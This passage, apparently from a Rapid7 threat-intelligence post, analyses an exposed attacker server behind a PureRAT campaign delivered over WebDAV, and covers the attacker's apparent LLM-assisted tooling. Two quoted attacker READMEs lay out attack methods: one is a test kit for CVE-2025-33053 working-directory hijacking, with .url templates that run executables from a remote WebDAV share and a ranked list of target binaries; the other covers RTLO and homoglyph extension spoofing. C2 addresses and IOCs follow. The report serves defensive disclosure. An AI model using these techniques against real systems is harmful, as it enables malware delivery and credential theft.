</em></span><span><span data-type="inlineCode"><em>coinbase</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Zelle</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>paypal</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>link.com</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>amazonrelay</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Exodus</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Electrum</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Bitcoin</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>monero</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Seed Phrase</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Seed</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>12</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>FCU</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Credit Union</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Account Overview</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Available Balance</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Merchant</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>online access</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>debit</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>credit</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>cvv</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>card</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>settlement</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>fees</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>loans</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>bank</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>banking</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>finance</em></span></span><span><em>, and </em></span><span><span data-type="inlineCode"><em>invest</em></span></span><span><em>. </em></span></p><p><span>The RAT also targeted browser wallet-extension artifacts and Chrome user data, including cookies and saved login data.</span></p><p><span>The two chains used different payloads and C2 infrastructure. In case study one, the stealer exfiltrated to </span><span><span data-type="inlineCode">77[.]110[.]127[.]205:56003</span></span><span>, while in the case study two stealer chain communicated with </span><span><span data-type="inlineCode">23[.]94[.]252[.]228:57666</span></span><span>. Based on our observations, the final RAT payload in both chains was identified as .NET-based PureRAT.</span></p><h3>GenAI adoption</h3><p><span>Several artifacts make it clear the attacker certainly used LLMs to build and iterate this operation. The directory is packed with structured README files, neatly formatted lure-generation guides, detailed test writeups, and matrix-style outputs that look exactly like templated or generated content. </span></p><p><span></span></p><pre language="c">═══════════════════════════════════════════════════════════════════
  WORKING DIRECTORY HIJACKING — COMPREHENSIVE TEST KIT
  for Windows 11 24H2
═══════════════════════════════════════════════════════════════════

This kit contains 59 .url files targeting different Windows binaries
that POTENTIALLY have the same Working Directory hijacking issue as
CVE-2025-33053 (Stealth Falcon, iediagcmd.exe).

ALL .url files use this exact format (same as the real APT attack):
  [InternetShortcut]
  URL=C:\path\to\target.exe         &lt;- legitimate binary
  WorkingDirectory=\\[REDACTED]@80\Downloads   &lt;- WebDAV (triggers WebClient!)
  ShowCommand=7                     &lt;- start minimized (hide alert windows)
  IconIndex=13                      &lt;- (decoy icon)
  IconFile=msedge.exe               &lt;- (decoy icon)

═══════════════════════════════════════════════════════════════════
HOW TO TEST (5 minutes)
═══════════════════════════════════════════════════════════════════

STEP 1: Upload ALL files from WEBDAV_PAYLOADS/ folder to:
        \\[REDACTED]\Downloads\
        (59 test files - each is 5KB MessageBox popup exe)

STEP 2: Copy I_LOLBIN_URLS/ folder to your Win11 24H2 machine

STEP 3: Double-click .url files one by one (or all of them in sequence)
        - If popup appears -&gt; HIJACK WORKS! Read parent process name in popup.
        - If nothing happens / error -&gt; doesn't work, move to next.

STEP 4: Tell me which I-numbers showed a popup. I'll integrate working
        ones as new methods in web-renamer.

═══════════════════════════════════════════════════════════════════
PRIORITY TESTING ORDER (most likely to work first)
═══════════════════════════════════════════════════════════════════

TIER 1 - CONFIRMED IN THE WILD:
  I01_iediagcmd.url           - CVE-2025-33053 (needs pre-June 2025 patch)
  I02_CustomShellHost.url     - CheckPoint research (may not exist on Server)

TIER 2 - .NET FRAMEWORK TOOLS (always installed if .NET 4.x present):
  I03_InstallUtil.url         - InstallUtilLib.dll search
  I04_RegAsm.url              - .NET registration
  I05_RegSvcs.url             - .NET services
  I06_CasPol.url              - .NET security policy
  I07_ngentask.url            - NGen native compile (calls ngen.exe!)
  I08_AddInUtil.url           - AddIn util (calls AddInProcess.exe!)
  I10_dfsvc.url               - ClickOnce service
  I15_csc.url                 - C# compiler (may call link.exe)
  I16_vbc.url                 - VB compiler

TIER 3 - WIN11 SYSTEM .NET TOOLS:
  I17_LbfoAdmin.url           - NIC teaming admin
  I19_UevAgentPolicyGenerator.url - UE-V agent (calls .ps1 files!)
  I20_UevAppMonitor.url       - UE-V monitor
  I23_AppVStreamingUX.url     - App-V streaming UI

TIER 4 - LOLBAS Execute-EXE binaries:
  I26_Pcwrun.url              - LOLBAS Execute(EXE)
  I28_WorkFolders.url         - LOLBAS Execute(EXE,Rename)
  I33_stordiag.url            - LOLBAS Execute(EXE) - calls systeminfo etc
  I36_Provlaunch.url          - LOLBAS Execute(CMD) - calls provtool.exe!

TIER 5 - UAC bypass binaries (worth testing):
  I49_fodhelper.url, I50_computerdefaults.url, I52_wsreset.url

═══════════════════════════════════════════════════════════════════
THE THEORY (so you understand WHY this works for some and not others)
═══════════════════════════════════════════════════════════════════

For the attack to succeed, the LOLBin must:
  1. Be a .NET application, OR call ShellExecute/CreateProcess with bare
     name (no full path).
  2. Spawn a child process by NAME (e.g. "ipconfig.exe") not by full path
     (e.g. "C:\Windows\System32\ipconfig.exe").
  3. Be runnable without command-line args.

If ANY of these is false, the hijack fails. Microsoft has been patching
specific binaries (iediagcmd.exe in June 2025) but the general pattern
remains. New vulnerable binaries are discovered regularly.

═══════════════════════════════════════════════════════════════════
WHAT THE POPUP TELLS YOU
═══════════════════════════════════════════════════════════════════

When hijack works, you'll see:
  TEST OK - Working Directory Hijack SUCCESS

  Executed as: route.exe                              &lt;- which name was hijacked
  Full path: \\[REDACTED]@80\Downloads\route.exe    &lt;- ran from WebDAV!
  Working dir: \\[REDACTED]@80\Downloads
  Parent process: iediagcmd                           &lt;- which LOLBin spawned it

═══════════════════════════════════════════════════════════════════
NOTES
═══════════════════════════════════════════════════════════════════

* Some I-files may target binaries that DON'T EXIST on your Win11 24H2
  (e.g. I02_CustomShellHost was missing on my test Server 2025).
  These will silently fail - just move on.

* Some I-files may launch the GUI tool (msconfig, dxdiag, etc.) WITHOUT
  triggering any hijack. That's fine - if no popup appears, no hijack.

* See _MAPPING.csv for full mapping of each .url to its target binary
  and expected child process names.</pre><p><span><em>Figure 7: Context of README.md found in the exposed directory.</em></span><em><br></em><br><span>The attacker left a build-time artifact inside the </span><span><span data-type="inlineCode">generate_test_lnk.ps1</span></span><span> output. The output directory is hardcoded in the </span><span><span data-type="inlineCode">$outDir</span></span><span> variable and exposes part of the attacker’s local project tree:</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f481d0cd28d6929/6a5e17f7b52ffd407785a683/Hardcoded-%24outDir-path.png" alt="Hardcoded-$outDir-path.png" caption="Figure 8: Hardcoded $outDir path exposing the attacker’s local project tree." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Hardcoded-$outDir-path.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f481d0cd28d6929/6a5e17f7b52ffd407785a683/Hardcoded-$outDir-path.png" data-sys-asset-uid="blt5f481d0cd28d6929" data-sys-asset-filename="Hardcoded-$outDir-path.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 8: Hardcoded $outDir path exposing the attacker’s local project tree." data-sys-asset-alt="Hardcoded-$outDir-path.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 8: Hardcoded $outDir path exposing the attacker’s local project tree.</figcaption></div></figure><p>⠀<em><br></em><span>It is therefore apparent that the entire campaign was likely created using the </span><a href="https://github.com/Akash-nath29/Coderrr" target="_blank"><span>CodeRRR project</span></a><span> with the help of LLM to assist with code generation and campaign development.</span></p><p><span>Another file we found in the directory was </span><span><span data-type="inlineCode">Simba_Service_Presentation.htm</span></span><span>, which appeared to document an attacker-controlled WebDAV delivery/admin panel. The panel also seems to have been generated with LLM assistance, based on its presentation-style formatting, API-documentation structure, emojis, and implementation details.</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8a0d6970395b2772/6a5e18471d6cdc8240fb0a26/Simba-server-screenshot-panel.png" alt="Simba-server-screenshot-panel.png" caption="Figure 9: Screenshot from the panel with an open presentation about Simba service, showing its architecture." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Simba-server-screenshot-panel.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8a0d6970395b2772/6a5e18471d6cdc8240fb0a26/Simba-server-screenshot-panel.png" data-sys-asset-uid="blt8a0d6970395b2772" data-sys-asset-filename="Simba-server-screenshot-panel.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 9: Screenshot from the panel with an open presentation about Simba service, showing its architecture." data-sys-asset-alt="Simba-server-screenshot-panel.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 9: Screenshot from the panel with an open presentation about Simba service, showing its architecture.</figcaption></div></figure><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c958992fad5cb62/6a5e18d6f480d88e07286a8a/Simba-server-system-requirements.png" alt="Simba-server-system-requirements.png" caption="Figure 10: Simba service system requirements." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Simba-server-system-requirements.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c958992fad5cb62/6a5e18d6f480d88e07286a8a/Simba-server-system-requirements.png" data-sys-asset-uid="blt3c958992fad5cb62" data-sys-asset-filename="Simba-server-system-requirements.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 10: Simba service system requirements." data-sys-asset-alt="Simba-server-system-requirements.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 10: Simba service system requirements.</figcaption></div></figure><p>⠀</p><p><span>The most telling artifact was a “comprehensive test kit” that expanded the single CVE-2025-33053 technique into 59 </span><span><span data-type="inlineCode">.url</span></span><span> files targeting different Windows binaries, such as .NET tools (</span><span><span data-type="inlineCode">InstallUtil</span></span><span>, </span><span><span data-type="inlineCode">RegAsm</span></span><span>, </span><span><span data-type="inlineCode">RegSvcs</span></span><span>, </span><span><span data-type="inlineCode">ngentask</span></span><span>), system utilities, LOLBAS execute-EXE binaries, and even UAC-bypass candidates. Each file was paired with a stated theory of why the working-directory hijack should work and a priority order for testing.</span></p><p><span>The directory was saturated with structured README files, neatly formatted lure-generation guides, matrix-style test write-ups, emoji-heavy admin-panel documentation, and a </span><span><span data-type="inlineCode">_MAPPING.csv</span></span><span> tying each test file to its target binary and expected child process. The consistency, verbosity, and sheer volume of organized artifacts led us to conclude that the attacker likely used an LLM-assisted workflow to do much of the heavy lifting around documentation, structure, and iteration.</span></p><p></p><pre language="c"># LNK Full Matrix Test — WebDAV Open Methods + Deception Techniques

**Location:** `C:\Users\Administrator\Desktop\LNK-Full-Matrix-Test`  
**Total files:** 60  
**Generated:** 2026-05-30

---

## Overview / Обзор

This folder contains a complete test matrix of **60 LNK shortcut files** combining all available WebDAV open methods with all LNK Deception Techniques supported by the Web-renamer project.

В этой папке находится полная тестовая матрица из **60 LNK-ярлыков**, объединяющих все доступные WebDAV-методы открытия со всеми техниками обмана LNK, поддерживаемыми проектом Web-renamer.

---

## Naming Scheme / Схема именования

All files follow the pattern:  
Все файлы следуют шаблону:

```
HyperPackSetup.&lt;method&gt;.&lt;trick&gt;.&lt;spoof&gt;.lnk
```

- **`HyperPackSetup`** — base filename / базовое имя файла
- **`&lt;method&gt;`** — WebDAV open method (e.g. `curl-http-temp-run`, `direct`, `cmd-start`) / метод открытия WebDAV
- **`&lt;trick&gt;`** — LNK deception technique (`standard`, `SPOOFEXE_HIDEARGS_DISABLETARGET`, etc.) / техника обмана LNK
- **`&lt;spoof&gt;`** — RTLO + homoglyph extension spoof (`‮ƒｄᴘ`) — visually appears as `.pdf` / спуф расширения через RTLO + гомоглифы — визуально выглядит как `.pdf`
- **`.lnk`** — real extension / реальное расширение

&gt; The spoof is applied **only to the extension** at the end, so the method and trick names remain clearly readable.  
&gt; Спуф применяется **только к расширению** в конце имени, поэтому названия методов и техник остаются читаемыми.
...</pre><p><span><em>Figure 11: This is a snippet from another </em></span><span><span data-type="inlineCode"><em>README.md</em></span></span><span><em>. The full README is available on Rapid7 Labs' </em></span><a href="https://github.com/rapid7/Rapid7-Labs/tree/main/IOCs/Simba%20Panel" target="_blank"><span><em>Github</em></span></a><span><em>. The text is original, and the translation to Russian was not added by us.</em></span></p><h3>OPSEC is hard </h3><p><span>As we mentioned previously, one of the artifacts we found in the open directory was a presentation file documenting a WebDAV delivery/admin panel called “Simba Service.”</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte7a569d4a484149e/6a5e199e1abad5303f7de1ad/simba-service-presentation.png" alt="simba-service-presentation.png" caption="Figure 12: Simba service presentation." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="simba-service-presentation.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte7a569d4a484149e/6a5e199e1abad5303f7de1ad/simba-service-presentation.png" data-sys-asset-uid="blte7a569d4a484149e" data-sys-asset-filename="simba-service-presentation.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 12: Simba service presentation." data-sys-asset-alt="simba-service-presentation.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 12: Simba service presentation.</figcaption></div></figure><p>⠀</p><p><span>The panel was built to manage a read-only WebDAV file share and track delivery activity in real time, including file opens, visitor IPs, geolocation, Windows versions, traffic, errors, folder-level conversion, and access events.</span></p><p><span>The actor not only used the same server for testing and staging files, but also recklessly left behind internal documentation for the backend used to manage and track delivery. The presentation reads like an internal build document, walking through the architecture, tech stack, API endpoints, authentication, logging, analytics, bug fixes, deployment setup, and panel access flow. It also included the panel IP and port, along with credentials.</span></p><p><span>Additionally, the file also looked like it was generated with an LLM. Its structured project overview, emoji-heavy sections, API-documentation format, and implementation details stood out. Basically, in some subfolders you can find LLM-generated READMEs with lures and malicious executables, while in another subfolder there is an admin panel with a hardcoded IP, port, and credentials.</span></p><p><span>We are intentionally withholding live access details, credentials, IP addresses, ports, and panel locations.</span></p><h3>Delivery panel overview</h3><p><span>The attacker appeared to have deployed the panel as-is, without changing the default password or port. The panel included several operator-facing sections: Review, Folders, Files, Visitors, Geography, Traffic/Server, Notes, File Manager, Users, Link Builder, Safety, and Documentation.</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt20dc8a76cc4cdc10/6a5e1a005e34b09034dfd8cd/simba-service-page-with-blocking-capabilities_.png" alt="simba-service-page-with-blocking-capabilities_.png" caption="Figure 13: Simba service page with blocking capabilities." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="simba-service-page-with-blocking-capabilities_.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt20dc8a76cc4cdc10/6a5e1a005e34b09034dfd8cd/simba-service-page-with-blocking-capabilities_.png" data-sys-asset-uid="blt20dc8a76cc4cdc10" data-sys-asset-filename="simba-service-page-with-blocking-capabilities_.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 13: Simba service page with blocking capabilities." data-sys-asset-alt="simba-service-page-with-blocking-capabilities_.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 13: Simba service page with blocking capabilities.</figcaption></div></figure><p>⠀</p><p><span>The portal was capable of detecting scanners and bots by analyzing behavioral indicators, including requests for non-existent resources, HTTP 404 responses, WebDAV probes, and directory enumeration attempts. Based on these observations, it assigned a risk score to each IP address and allowed the operator to manually block flagged hosts. Portal records indicate that the blocking configuration was modified at least 3 times during the campaign (June 5, June 10, and June 20).</span></p><p><span>We analyzed telemetry from the WebDAV delivery service over an approximately 5.5-day window (June 20–26, 2026 UTC), which recorded 77,098 requests from 3,892 unique client IPs across 101 countries, with roughly 45.9 GB transferred.</span></p><p><span>The activity was short-lived and high-volume, peaking between June 21 and June 24 before dropping sharply. Based on this data we can assume that it was a targeted delivery campaign.</span></p><p><span>Most of the launch activity came from one specific lure: a CURP-themed fake PDF report under the </span><span><span data-type="inlineCode">/Downloads/CURP/ReportFinal.rcs.pdf</span></span><span> (RTLO-spoofed </span><span><span data-type="inlineCode">.scr</span></span><span> executable.) Out of 2,441 observed executable launch events, 2,384, or approximately 97.7%, were tied to this lure. It accounted for approximately 14.6 GB of traffic and was accessed by 1,869 unique client IPs.</span></p><p><span>The WebDAV traffic was heavily concentrated in Mexico. Mexico generated 63,622 requests, representing 82.5% of all traffic, and 2,365 launch events, or approximately 96.9% of all observed launches. The next largest sources of traffic, including the United States and Germany, produced far fewer launch events and appeared more consistent with scanning, research, or automated retrieval.</span></p><p><em></em></p><table><colgroup data-width="1250"><col><col><col><col><col></colgroup><tbody><tr><td><p><span><strong>Country</strong></span></p></td><td><p><span><strong>Requests</strong></span></p></td><td><p><span><strong>Share of requests</strong></span></p></td><td><p><span><strong>Unique client IPs</strong></span></p></td><td><p><span><strong>Launch events</strong></span></p></td></tr><tr><td><p><span>Mexico</span></p></td><td><p><span>63,622</span></p></td><td><p><span>82.5%</span></p></td><td><p><span>2,698</span></p></td><td><p><span>2,365</span></p></td></tr><tr><td><p><span>United States</span></p></td><td><p><span>4,032</span></p></td><td><p><span>5.2%</span></p></td><td><p><span>463</span></p></td><td><p><span>47</span></p></td></tr><tr><td><p><span>Germany</span></p></td><td><p><span>2,751</span></p></td><td><p><span>3.6%</span></p></td><td><p><span>59</span></p></td><td><p><span>1</span></p></td></tr><tr><td><p><span>United Kingdom</span></p></td><td><p><span>645</span></p></td><td><p><span>0.8%</span></p></td><td><p><span>40</span></p></td><td><p><span>0</span></p></td></tr><tr><td><p><span>Netherlands</span></p></td><td><p><span>532</span></p></td><td><p><span>0.7%</span></p></td><td><p><span>49</span></p></td><td><p><span>1</span></p></td></tr><tr><td><p><span>France</span></p></td><td><p><span>407</span></p></td><td><p><span>0.5%</span></p></td><td><p><span>21</span></p></td><td><p><span>0</span></p></td></tr><tr><td><p><span>Finland</span></p></td><td><p><span>401</span></p></td><td><p><span>0.5%</span></p></td><td><p><span>6</span></p></td><td><p><span>10</span></p></td></tr><tr><td><p><span>Brazil</span></p></td><td><p><span>343</span></p></td><td><p><span>0.4%</span></p></td><td><p><span>41</span></p></td><td><p><span>0</span></p></td></tr><tr><td><p><span>Republic of Korea</span></p></td><td><p><span>312</span></p></td><td><p><span>0.4%</span></p></td><td><p><span>16</span></p></td><td><p><span>1</span></p></td></tr></tbody></table><p><span><em>Table 3: Geographic distribution of WebDAV delivery activity.</em></span></p><p><span><em></em></span></p><p><span>Mexico was not only the largest source of traffic, but also the source of nearly all observed launch activity. Within Mexico, the activity was geographically broad, spanning hundreds of cities rather than clustering around a single locality. The top five Mexican cities accounted for approximately 27.4% of Mexican launch events, with Mexico City alone accounting for approximately 15.7%.</span></p><p><span>Hourly requests to the WebDAV delivery service also supported the assessment that much of the traffic came from real user interaction rather than only automated internet scanners. Traffic peaked between 16:00 and 19:00 UTC, which corresponds to working hours in central Mexico.</span></p><p><span>By launch events, we mean cases where the WebDAV panel showed that a client opened or requested an executable file in a way that looked like an attempted run, such as a </span><span><span data-type="inlineCode">GET</span></span><span> request for an </span><span><span data-type="inlineCode">.scr</span></span><span> or </span><span><span data-type="inlineCode">.exe</span></span><span> file from the delivery share. This does not mean we confirmed malware execution on the endpoint. It means the delivery infrastructure saw the file being accessed or invoked.</span></p><h2>Protocol behavior</h2><p><span>The HTTP methods and status codes show how clients interacted with the WebDAV delivery service. </span><span><span data-type="inlineCode">PROPFIND</span></span><span> requests and </span><span><span data-type="inlineCode">207</span></span><span> responses indicate directory browsing, which is typical when Windows Explorer accesses a remote WebDAV location. </span><span><span data-type="inlineCode">GET</span></span><span> requests and </span><span><span data-type="inlineCode">200</span></span><span> responses show file retrieval, including executable files opened or requested from the share.</span></p><p><span></span></p><table><colgroup data-width="500"><col><col></colgroup><tbody><tr><td><p><span><strong>Method</strong></span></p></td><td><p><span><strong>Count</strong></span></p></td></tr><tr><td><p><span>PROPFIND</span></p></td><td><p><span>57,287</span></p></td></tr><tr><td><p><span>GET</span></p></td><td><p><span>13,088</span></p></td></tr><tr><td><p><span>OPTIONS</span></p></td><td><p><span>6,597</span></p></td></tr><tr><td><p><span>PROPPATCH</span></p></td><td><p><span>125</span></p></td></tr><tr><td><p><span>LOCK</span></p></td><td><p><span>1</span></p></td></tr></tbody></table><p><span><em>Table 4: HTTP methods observed in WebDAV delivery traffic.</em></span></p><p><span><em></em></span></p><table><colgroup data-width="500"><col><col></colgroup><tbody><tr><td><p><span><strong>Status</strong></span></p></td><td><p><span><strong>Count</strong></span></p></td></tr><tr><td><p><span>207</span></p></td><td><p><span>57,412</span></p></td></tr><tr><td><p><span>200</span></p></td><td><p><span>19,532</span></p></td></tr><tr><td><p><span>206</span></p></td><td><p><span>154</span></p></td></tr></tbody></table><p><span><em>Table 5: HTTP status codes observed in WebDAV delivery traffic.</em></span></p><h2><span>MITRE ATT&amp;CK techniques</span></h2><table><colgroup data-width="1010"><col><col><col></colgroup><tbody><tr><td><p><span><strong>Name</strong></span></p></td><td><p><span><strong>MITRE ATT&amp;CK technique</strong></span></p></td><td><p><span><strong>Code</strong></span></p></td></tr><tr><td><p><span>Payload execution</span></p></td><td><p><span>User Execution: Malicious File</span></p></td><td><p><span>T1204.002</span></p></td></tr><tr><td><p><span>Masquerading</span></p></td><td><p><span>Right-to-Left Override</span></p></td><td><p><span>T1036.002</span></p></td></tr><tr><td><p><span>Masquerading</span></p></td><td><p><span>Double File Extension</span></p></td><td><p><span>T1036.007</span></p></td></tr><tr><td><p><span>DLL sideloading</span></p></td><td><p><span>Hijack Execution Flow: DLL</span></p></td><td><p><span>T1574.001</span></p></td></tr><tr><td><p><span>Obfuscation</span></p></td><td><p><span>Encrypted/Encoded File</span></p></td><td><p><span>T1027.013</span></p></td></tr><tr><td><p><span>Payload unpacking</span></p></td><td><p><span>Deobfuscate/Decode Files or Information</span></p></td><td><p><span>T1140</span></p></td></tr><tr><td><p><span>Payload carrier</span></p></td><td><p><span>Steganography / image-carried payload data</span></p></td><td><p><span>T1027.003</span></p></td></tr><tr><td><p><span>API hiding</span></p></td><td><p><span>Dynamic API Resolution</span></p></td><td><p><span>T1027.007</span></p></td></tr><tr><td><p><span>In-memory loading</span></p></td><td><p><span>Reflective Code Loading</span></p></td><td><p><span>T1620</span></p></td></tr><tr><td><p><span>Injection</span></p></td><td><p><span>Process Hollowing</span></p></td><td><p><span>T1055.012</span></p></td></tr><tr><td><p><span>Native API use</span></p></td><td><p><span>Native API</span></p></td><td><p><span>T1106</span></p></td></tr><tr><td><p><span>Sandbox evasion</span></p></td><td><p><span>Time Based Evasion</span></p></td><td><p><span>T1497.003</span></p></td></tr><tr><td><p><span>Anti-analysis</span></p></td><td><p><span>Debugger / instrumentation checks</span></p></td><td><p><span>T1622</span></p></td></tr><tr><td><p><span>UAC bypass</span></p></td><td><p><span>Bypass User Account Control</span></p></td><td><p><span>T1548.002</span></p></td></tr><tr><td><p><span>Persistence</span></p></td><td><p><span>Registry Run Keys / Startup Folder</span></p></td><td><p><span>T1547.001</span></p></td></tr><tr><td><p><span>Persistence</span></p></td><td><p><span>Scheduled Task</span></p></td><td><p><span>T1053.005</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Keylogging</span></p></td><td><p><span>T1056.001</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Screen Capture</span></p></td><td><p><span>T1113</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Clipboard Data</span></p></td><td><p><span>T1115</span></p></td></tr><tr><td><p><span>Credential access</span></p></td><td><p><span>Credentials from Web Browsers</span></p></td><td><p><span>T1555.003</span></p></td></tr><tr><td><p><span>Credential access</span></p></td><td><p><span>Steal Web Session Cookie</span></p></td><td><p><span>T1539</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Data from Local System</span></p></td><td><p><span>T1005</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Automated Collection</span></p></td><td><p><span>T1119</span></p></td></tr><tr><td><p><span>Staging</span></p></td><td><p><span>Archive Collected Data: Archive via Utility</span></p></td><td><p><span>T1560.001</span></p></td></tr><tr><td><p><span>C2</span></p></td><td><p><span>Encrypted Channel</span></p></td><td><p><span>T1573</span></p></td></tr><tr><td><p><span>Exfiltration</span></p></td><td><p><span>Exfiltration Over C2 Channel</span></p></td><td><p><span>T1041</span></p></td></tr><tr><td><p><span>Possible persistence</span></p></td><td><p><span>WMI Event Subscription</span></p></td><td><p><span>T1546.003</span></p></td></tr><tr><td><p><span>Phishing lure generation</span></p></td><td><p><span>Generate Phishing Lures</span></p></td><td><p><span>AML.T0052</span></p></td></tr><tr><td><p><span>Resource Development</span></p></td><td><p><span>Resource Development</span></p></td><td><p><span>AML.TA0003</span></p></td></tr><tr><td><p><span>Obtain capabilities via LLM tooling</span></p></td><td><p><span>Obtain Capabilities</span></p></td><td><p><span>AML.T0016</span></p></td></tr><tr><td><p><span>LLM-assisted capability development</span></p></td><td><p><span>Develop Capabilities</span></p></td><td><p><span> AML.T0017</span></p></td></tr><tr><td><p><span>LLM prompt crafting for attack documentation</span></p></td><td><p><span>LLM Prompt Crafting</span></p></td><td><p><span>AML.T0065</span></p></td></tr><tr><td><p><span>Obtain capabilities via tooling</span></p></td><td><p><span>Obtain Capabilities: Software Tools</span></p></td><td><p><span>AML.T0016.001</span></p></td></tr></tbody></table><h2><span>Indicators of compromise (IOCs)</span></h2><h3>CURP campaign</h3><p>Phishing page: hxxps://gobf[.]mx </p><p>WebDav server: onedrive[.]cv</p><p></p><p>ReportFinal.&lt;RLO&gt;.scr    SHA256 04A8018191F2E9E76072D072A933371D9D669A42DE2B2A087541CD3A653B0BA7</p><p></p><p>C2: 77.110.127.205 ports 56001-56003 / 57666 / 57777 / 57888</p><p>Domain: google.services[.]ug</p><p>Campaign tag:06x12x2026SantaEbash2  (v4.4.3)</p><p>Schedule tasks: brokerhost, net_queue_32</p><p></p><p>Staging paths:</p><p>%TEMP%\is-XXXXX.tmp\Fo-Binary.exe </p><p>%AppData%\Roaming\inttracer_i686_prod\      </p><p> C:\ProgramData\inttracer_i686_prod\</p><h3>DlrtyGames campaign </h3><p>C2: 23[.]94[.]252[.]228:57666</p><p>JA3: fc54e0d16d9764783542f0146a98b300</p><p>DlrtyGames.exe</p><p>SHA256: e8be17a7fbef48b45f1e958b3ae5ebdfcad58808969982c431a905eefcae5268</p><p>discord-rpc.x64.dll</p><p>SHA256: 449d1121fa275879af22a20407aa7253ac750ac8fa7ff5691101752600d645df</p><p>profiler16.dll</p><p>SHA256: a88f5ee748e60f889d046718bfe3ddcf1c5f3cba2001cad587e8953a76bf7aa9</p><p>loader-pool.db</p><p>SHA256: 51a02eccdcae0483c7cbb9796738eee6c2a13b740d30e5417cda09bf418ea93b</p><p>.NET RAT</p><p>SHA256: 82e67735cf822db8f2f759e742e5bf8c54fdbd01a4170619b9e0916e1b3f5923</p><p>Staging paths:</p><p>C:\ProgramData\basenet\</p><p>%APPDATA%\basenet\</p><p>Persistence:</p><p>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\XNNNMHJAZNCNHGIKJDW</p><p>\com_app_bg_i686</p><p>\messenger_component_v8_32_rc</p><p></p><p>More indicators of compromise can be found on Rapid7’s <a href="https://github.com/rapid7/Rapid7-Labs/tree/main/IOCs/Simba%20Panel" target="_blank">GitHub</a>.</p><h2>Rapid7 customers</h2><p>Customers using Rapid7’s Intelligence Hub gain direct access to all IOCs from this campaign, including any future indicators as they are identified.</p><h2>Conclusion</h2><p><span>The operator’s OPSEC failed in the best way possible for defenders. Thanks to a completely exposed server, we managed to pull down their entire operational toolkit: staged payloads, lure templates, testing files, builder notes, and active campaign artifacts. This sloppiness effectively offered a rare, transparent view of their end-to-end delivery pipeline rather than just the final malware it served.</span></p><p><span>The real impact shows up in speed and scale. The actor generated lure variants in bulk, tested them systematically, documented results, and refined delivery techniques in short cycles. The artifacts also suggested that attackers used LLM for rapid lure generation and development since their cPanel was vibecoded. </span></p><p><span>While the fact that attackers are adopting genAI in their workflows is nothing new, looking past the novelty reveals a much more practical shift in adversary operations.</span></p><p><span>The takeaway isn’t that “AI wrote the malware.” It’s that the attacker used LLMs to operate more like a modern software product team. The use of genAI enables them to prototype, test, and scale their delivery pipeline at a fast pace.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacker löscht Rumäniens gesamte Landregisterdatenbank – Stillstand im Immobilienmarkt]]></title>
